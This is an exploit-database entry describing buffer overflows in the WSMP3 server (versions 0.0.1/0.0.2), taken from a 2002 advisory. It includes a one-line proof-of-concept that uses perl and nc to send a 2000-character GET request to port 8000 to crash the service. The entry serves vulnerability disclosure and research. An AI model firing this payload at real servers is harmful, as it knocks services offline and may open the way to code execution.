WSMP3 0.0.1/0.0.2 - Multiple Buffer Overflow Vulnerabilities

EDB-ID:

22033

CVE:

N/A

EDB Verified:

Author:

dong-h0un U

Type:

dos

Exploit:   /  

Platform:

Linux

Date:

2002-11-25

Vulnerable App: 
source: https://www.securityfocus.com/bid/6239/info

Several buffer overflow conditions have been reported for WSMP3. The vulnerability is due to improper bounds checking when copying data to local buffers.

An attacker can exploit this vulnerability by sending an overly long request to the vulnerable server. This will trigger the buffer overflow condition, resulting in memory corruption. Ovewriting sensitive memory with malicious values may allow an attacker to execute arbitrary code on the target system.

(echo "GET `perl -e 'print \"x\"x2000'`";cat)|nc 0 8000
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services